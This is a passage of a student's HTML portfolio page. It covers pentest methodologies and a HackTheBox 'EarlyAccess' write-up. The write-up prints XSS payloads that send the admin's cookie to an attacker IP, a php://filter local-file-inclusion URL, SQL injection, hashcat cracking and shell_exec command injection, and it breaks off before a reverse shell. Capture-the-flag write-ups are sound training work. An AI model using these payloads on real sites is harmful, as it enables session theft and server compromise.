          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
